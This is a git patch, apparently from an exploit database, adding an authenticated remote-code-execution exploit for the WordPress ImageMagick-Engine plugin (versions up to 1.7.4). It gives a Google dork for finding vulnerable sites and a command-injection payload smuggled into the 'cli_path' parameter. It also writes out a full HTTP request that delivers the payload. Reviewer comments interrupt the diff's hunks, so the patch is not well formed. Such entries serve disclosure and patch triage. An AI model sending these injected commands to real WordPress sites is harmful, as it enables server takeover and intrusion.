From b4e29f1fae9fe4aaced5ae0d18ffce260a8165ff Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 18 Oct 2022 05:01:47 +0000
Subject: [PATCH] DB: 2022-10-18

1 changes to exploits/shellcodes

Wordpress Plugin ImageMagick-Engine 1.7.4 - Remote Code Execution (RCE) (Authenticated)
---
 exploits/php/webapps/51025.txt | 33 +++++++++++++++++++++++++++++++++
 files_exploits.csv | 1 +
 2 files changed, 34 insertions(+)
 create mode 100644 exploits/php/webapps/51025.txt

diff --git a/exploits/php/webapps/51025.txt b/exploits/php/webapps/51025.txt
new file mode 100644
index 000000000..c80f77018
--- /dev/null
+++ b/exploits/php/webapps/51025.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Wordpress Plugin ImageMagick-Engine 1.7.4 - Remote Code Execution (RCE) (Authenticated)
+# Google Dork: inurl:"/wp-content/plugins/imagemagick-engine/"
+# Date: Thursday, September 1, 2022
+# Exploit Author: ABDO10
+# Vendor Homepage: https://wordpress.org/plugins/imagemagick-engine/
+# Software Link: https://github.com/orangelabweb/imagemagick-engine/
+# Version: <= 1.7.4
+# Tested on: windows 10
+
+-- vulnerable section
+https://github.com/orangelabweb/imagemagick-engine/commit/73c1d837e0a23870e99d5d1470bd328f8b2cbcd4#diff-83bcdfbbb7b8eaad54df4418757063ad8ce7f692f189fdce2f86b2fe0bcc0a4dR529
+
+-- payload on windows: d&calc.exe&anything
+-- on unix : notify-send "done"
+-- exploit :
+
+GET /wp/wordpress/wp-admin/admin-ajax.php?action=ime_test_im_path&cli_path=[payload]
+HTTP/1.1
+Host: localhost
+Cookie: wordpress_sec_xx=; wp-settings-time-1=;
+wordpress_test_cookie=; wordpress_logged_in_xx=somestuff
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0)
+Gecko/20100101 Firefox/104.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://localhost/wp/wordpress/wp-admin/options-general.php?page=imagemagick-engine
+X-Requested-With: XMLHttpRequest
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+Connection: close
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 952f95c0a..5c7cc97ac 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
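Review bot: The header block of 51025.txt gives `# Version: <= 1.7.4` but no fixed release, CVE or advisory reference, so someone triaging an installed plugin cannot tell from this entry which version to upgrade to; the only pointer is the commit link under `-- vulnerable section`. I would add `# Fixed in: <FIXED_VERSION>` and `# CVE: <CVE-ID or N/A>` to the header (placeholders, since neither value appears on the page). The entry also never states the root cause: judging from the request, the `cli_path` parameter of the `ime_test_im_path` AJAX action appears to reach a shell command unescaped. A one-line `-- root cause:` comment saying so, plus the role that `(Authenticated)` in the title refers to, would let defenders judge exposure and alert on that action in access logs without reading the plugin diff.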
@@ -45086,3 +45086,4 @@ id,file,description,date,author,type,platform,port
 51022,exploits/php/webapps/51022.txt,"Aero CMS v0.0.1 - SQLi",1970-01-01,nu11secur1ty,webapps,php,
 51023,exploits/php/webapps/51023.txt,"Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)",1970-01-01,"Ashkan Moghaddas",webapps,php,
 51024,exploits/php/webapps/51024.txt,"Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi",1970-01-01,"Rizacan Tufan",webapps,php,
+51025,exploits/php/webapps/51025.txt,"Wordpress Plugin ImageMagick-Engine 1.7.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,ABDO10,webapps,php,
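Review bot: The added row carries `1970-01-01` in the date column, while the entry it indexes states `# Date: Thursday, September 1, 2022` and the commit itself is dated 2022-10-18. The epoch value looks like an unset default rather than a real date (the three context rows above have it too). Anything that sorts or filters this index by date, such as a feed that surfaces newly published entries for patch triage, will misplace the row. The field should hold the real date, e.g. `2022-10-18` in place of `1970-01-01` if the column is meant to be the publication date; which date the column represents is not visible from this hunk.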